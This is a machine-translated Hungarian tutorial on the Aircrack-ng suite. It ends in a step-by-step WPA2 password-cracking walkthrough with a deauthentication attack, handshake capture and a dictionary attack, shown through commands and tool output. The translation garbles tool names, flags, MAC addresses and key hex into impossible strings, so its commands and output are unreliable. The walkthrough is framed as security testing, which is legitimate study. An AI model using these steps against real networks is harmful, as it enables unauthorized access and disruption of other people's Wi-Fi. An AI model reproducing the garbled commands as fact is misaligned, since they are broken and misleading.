Hogyan kell használni az Aircrack-ng-t

How Use Aircrack Ng



Az emberek legtöbbször soha nem gondolnak arra a hálózatra, amelyhez kapcsolódnak. Soha nem gondolnak arra, mennyire biztonságos ez a hálózat, és mennyire kockáztatják bizalmas adataikat naponta. A sebezhetőségi ellenőrzéseket futtathatja a wifi -hálózatokon egy nagyon hatékony, ún Aircrack-ng és a Wireshark. A Wireshark a hálózati tevékenység figyelésére szolgál. Aircrack-ng inkább egy agresszív eszköz, amely lehetővé teszi a csapkodást és a vezeték nélküli kapcsolatokhoz való hozzáférést. A betolakodóként való gondolkodás mindig is a legbiztonságosabb módja volt a hackelés elleni védelemnek. Lehetséges, hogy a repülőgépek megismerésével pontosan meg tudja érteni azokat a műveleteket, amelyeket egy betolakodó megtesz, hogy hozzáférjen a rendszeréhez. Ezután elvégezheti a megfelelőségi ellenőrzéseket saját rendszerén annak biztosítása érdekében, hogy az ne legyen bizonytalan.

Aircrack-ng egy teljes szoftverkészlet, amelyet a WiFi hálózat biztonságának tesztelésére terveztek. Ez nem csak egyetlen eszköz, hanem olyan eszközök gyűjteménye, amelyek mindegyike meghatározott célt szolgál. A wifi biztonság különböző területein lehet dolgozni, mint például a hozzáférési pont figyelése, tesztelés, a hálózat megtámadása, a wifi hálózat feltörése és tesztelése. Az Aircrack legfontosabb célja a csomagok elfogása és a jelszavak feltöréséhez szükséges hash -kódok megfejtése. Szinte az összes új vezeték nélküli interfészt támogatja. Aircrack-ng az Aircrack elavult szerszámkészlet továbbfejlesztett változata, ng a Új generáció . Néhány fantasztikus eszköz, amelyek együtt dolgoznak egy nagyobb feladat elvégzésében.







Airmon:

Az Airmon-ng az aircrack-ng készletben található, amely a hálózati interfészkártyát monitor üzemmódba helyezi. A hálózati kártyák általában csak azokat a csomagokat fogadják el, amelyeket a hálózati kártya MAC-címe határoz meg, de az airmon-ng esetén az összes vezeték nélküli csomagot is elfogadják, függetlenül attól, hogy őket célozzák-e vagy sem. Ezeket a csomagokat a hozzáférési ponttal való összekapcsolás vagy hitelesítés nélkül kell elkapnia. A hozzáférési pont állapotának ellenőrzésére szolgál a hálózati interfész monitor módba állításával. Először is be kell állítani a vezeték nélküli kártyákat, hogy bekapcsolják a monitor módot, majd meg kell ölni az összes háttérfolyamatot, ha úgy gondolja, hogy bármely folyamat zavarja azt. A folyamatok befejezése után a monitor mód engedélyezhető a vezeték nélküli interfészen az alábbi parancs futtatásával:



[e -mail védett]: ~ $sudoairmon-ng start wlan0#

A monitor módot is letilthatja, ha az airmon-ng-t bármikor leállítja az alábbi paranccsal:

[e -mail védett]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Az Airodump-ng a minket körülvevő összes hálózat felsorolására és a velük kapcsolatos értékes információk megtekintésére szolgál. Az airodump-ng alapvető funkciói a csomagok szaglászása, tehát lényegében úgy van programozva, hogy a monitor módba helyezése közben megragadja a körülöttünk lévő összes csomagot. Futtatjuk a körülöttünk lévő összes kapcsolat ellen, és adatokat gyűjtünk, például a hálózathoz csatlakozó ügyfelek számát, a megfelelő mac -címeket, titkosítási stílust és csatornaneveket, majd elkezdjük megcélozni a célhálózatunkat.

Ha beírja az airodump-ng parancsot, és megadja a hálózati interfész nevét paraméterként, akkor aktiválhatjuk ezt az eszközt. Felsorolja az összes hozzáférési pontot, az adatcsomagok mennyiségét, a használt titkosítási és hitelesítési módszereket, valamint a hálózat nevét (ESSID). Hackelési szempontból a mac címek a legfontosabb mezők.

[e -mail védett]: ~ $sudoairodump-ng wlx0mon

Repülőgép:

Az Aircrack jelszó feltörésére szolgál. Miután az összes csomagot elfogtuk az airodump segítségével, repedéssel feltörhetjük a kulcsot. Ezeket a kulcsokat két módszerrel, a PTW és az FMS segítségével törik fel. A PTW megközelítés két fázisban történik. Eleinte csak az ARP csomagokat használják, és csak akkor, ha a kulcs nem törik meg a keresés után, akkor az összes többi rögzített csomagot használja. A PTW megközelítés plusz pontja, hogy nem minden csomagot használnak a feltöréshez. A második megközelítésben, azaz az FMS -ben mind a statisztikai modelleket, mind a nyers erő algókat használjuk a kulcs feltöréséhez. Szótár módszer is használható.

Lejátszás:

Az Airplay-ng csomagokat vezet be a vezeték nélküli hálózatba a forgalom létrehozása vagy felgyorsítása érdekében. Az aireplay-ng két különböző forrásból származó csomagokat rögzíthet. Az első az élő hálózat, a második pedig a már létező pcap fájlból származó csomagok. Az Airplay-ng hasznos a hitelesítés-támadás során, amely egy vezeték nélküli hozzáférési pontot és egy felhasználót céloz meg. Ezenkívül néhány támadást végrehajthat, például a kávé latte támadását az airplay-ng eszközzel, amely lehetővé teszi, hogy kulcsot szerezzen az ügyfél rendszeréből. Ezt úgy érheti el, hogy elkap egy ARP csomagot, majd manipulálja és visszaküldi a rendszerhez. Az ügyfél ezután létrehoz egy csomagot, amelyet az airodump rögzíthet, és az aircrack feltöri a módosított csomag kulcsát. Az airplay-ng további támadási lehetőségei közé tartozik a chopchop, fragment arepreplay stb.

Légibázis:

Az Airbase-ng-t arra használják, hogy a betolakodó számítógépét veszélyeztetett kapcsolódási ponttá alakítsák, hogy mások linkelhessenek. Az Airbase-ng használatával azt állíthatja, hogy legális hozzáférési pont, és emberközép támadásokat hajthat végre a hálózatához csatlakoztatott számítógépek ellen. Az ilyen típusú támadásokat gonosz iker támadásoknak nevezik. Az alapfelhasználók nem tudnak különbséget tenni a legális hozzáférési pont és a hamis hozzáférési pont között. Tehát a gonosz ikerfenyegetés az egyik legveszélyesebb vezeték nélküli fenyegetés, amellyel ma szembesülünk.

Airolib-ng:

Az Airolib felgyorsítja a hackelési folyamatot a jelszólisták és a hozzáférési pont tárolásával és kezelésével. A program által használt adatbázis -kezelő rendszer az SQLite3, amely többnyire minden platformon elérhető. A jelszófeltörés magában foglalja a páros mesterkulcs kiszámítását, amelyen keresztül a privát tranziens kulcsot (PTK) kinyerik. A PTK segítségével meghatározhatja az adott csomag keretüzenet -azonosító kódját (MIC), és elméletileg megállapíthatja, hogy a MIC hasonló a csomaghoz, tehát ha a PTK -nak igaza volt, akkor a PMK -nak is igaza volt.

Az adatbázisban tárolt jelszólisták és hozzáférési hálózatok megtekintéséhez írja be a következő parancsot:

[e -mail védett]: ~ $sudoairolib-ng tesztadatbázis –statisztika

Itt a tesztadatbázis az a db, amelyet el szeretne érni vagy létrehozni, a –stats pedig az azon végrehajtandó művelet. Több műveletet is elvégezhet az adatbázis mezőkön, például maximális prioritást adhat valamilyen SSID -nek vagy ilyesmi. Az airolib-ng és aircrack-ng használatához írja be a következő parancsot:

[e -mail védett]: ~ $sudorepülőgép-repülés-rtesztadatbázis wpa2.eapol.cap

Itt a már kiszámított PMK -kat használjuk a teszt adatbázis a jelszó feltörési folyamat felgyorsítása érdekében.

A WPA/WPA2 feltörése az Aircrack-ng használatával:

Nézzünk egy kis példát arra, hogy mire képes az aircrack-ng néhány fantasztikus eszköze segítségével. Egy WPA/WPA2 hálózat előre megosztott kulcsát feltörjük egy szótár módszerrel.

Az első dolog, amit meg kell tennünk, felsoroljuk azokat a hálózati interfészeket, amelyek támogatják a monitor módot. Ezt a következő paranccsal teheti meg:

[e -mail védett]: ~ $sudolevegő-ng

PHY interfész illesztőprogram -lapkakészlet

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Láthatunk egy felületet; Most a megtalált hálózati interfészt (wlx0) monitor módba kell helyeznünk a következő paranccsal:

[e -mail védett]: ~ $sudoairmon-ng start wlx0

A monitor módot engedélyezte az ún wlx0mon .

Most el kell kezdenünk hallgatni a közeli útválasztók adásait a monitor módba helyezett hálózati interfészünkön keresztül.

[e -mail védett]: ~ $sudoairodump-ng wlx0mon

CH5 ][Eltelt:30s][ 2020-12-02 00:17



BSSID PWR jelzőfények#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Négy öt 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:LENNI-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: ADJA:88: FA:38: 02-68 28 2 0 tizenegy54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Négy öt: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31IDŐSZÁMÍTÁSUNK ELŐTT:91: B5: F8: 7E: D5 -390e-1 1002 13

Célhálózatunk az Crackit ebben az esetben, amely jelenleg az 1 -es csatornán fut.

Itt a célhálózat jelszavának feltöréséhez négyirányú kézfogást kell rögzítenünk, amely akkor történik, amikor egy eszköz megpróbál csatlakozni a hálózathoz. A következő paranccsal rögzíthetjük:

[e -mail védett]: ~ $sudoairodump-ng-c 1--bassid E4: 6F:13: 04: CE:31 -ban ben /home wlx0

-c : Csatorna

- Bss : Bssid a célhálózatból

-ban ben : Annak a könyvtárnak a neve, ahová a pcap fájl kerül

Most meg kell várnunk, amíg egy eszköz csatlakozik a hálózathoz, de van egy jobb módszer a kézfogás rögzítésére. Az eszközök hitelesítését az AP -hez egy hitelesítési támadás segítségével a következő paranccsal hajthatjuk végre:

[e -mail védett]: ~ $sudoaireplay-ng-0 -nak nekE4: 6F:13: 04: CE:31

nak nek : Bssid a célhálózatból

-0 : deauthentication támadást

Az összes eszközt leválasztottuk, és most várnunk kell, amíg egy eszköz csatlakozik a hálózathoz.

CH1 ][Eltelt:30s][ 2020-12-02 00:02][WPA kézfogás: E4: 6F:13: 04: CE:31



BSSID PWR RXQ jelzőfények#Adatok, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31IDŐSZÁMÍTÁSUNK ELŐTT:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Négy öt: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e-6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Találatot kaptunk, és ha az idő mellett a jobb felső sarkot nézzük, láthatjuk, hogy kézfogás történt. Most nézze meg a megadott mappát ( /itthon esetünkben) a .pcap fájlt.

A WPA kulcs feltöréséhez a következő parancsot használhatjuk:

[e -mail védett]: ~ $sudorepülőgép-repülés-a2 -ban benrockyou.txt-bE4: 6F:13: 04: CE:31kézfogás.kap

b: Bssid a célhálózatból

-a2: WPA2 mód

Rockyou.txt: A szótárfájlthasznált

Kézfogás.sapka: Azfájlt melyikrögzített kézfogást tartalmaz

Aircrack-ng1.2béta3

[00:01:49] 10566kulcsok tesztelve(1017,96nak nek/s)

KULCS! [megfogtál]

Fő kulcs: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FötvenC


Átmeneti kulcs: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FötvenC025 62E9 5D71

Célhálózatunk kulcsa sikeresen feltört.

Következtetés:

A vezeték nélküli hálózatok mindenhol megtalálhatók, minden vállalat használja, az okostelefonokat használó dolgozóktól az ipari vezérlőeszközökig. A kutatások szerint 2021 -ben az internetes forgalom majdnem több mint 50 százaléka WiFi -n lesz, a vezeték nélküli hálózatoknak számos előnye van, a külső ajtók közötti kommunikáció, a gyors internet -hozzáférés olyan helyeken, ahol szinte lehetetlen vezetéket fektetni, kábelek telepítése nélkül is bővítheti a hálózatot. bármely más felhasználó számára, és könnyedén csatlakoztathatja mobileszközeit otthoni irodáihoz, amíg Ön nincs ott.

Ezen előnyök ellenére van egy nagy kérdőjel a magánéletével és biztonságával kapcsolatban. Mivel ezek a hálózatok; Az átviteli tartományon belül az útválasztók mindenki számára nyitottak, könnyen támadhatók, és az adatok könnyen veszélybe kerülhetnek. Például, ha valamilyen nyilvános wifi -hez van csatlakoztatva, akkor bárki, aki ehhez a hálózathoz csatlakozik, könnyen ellenőrizheti a hálózati forgalmat némi intelligencia és a rendelkezésre álló félelmetes eszközök segítségével, és akár ki is dobhatja azt.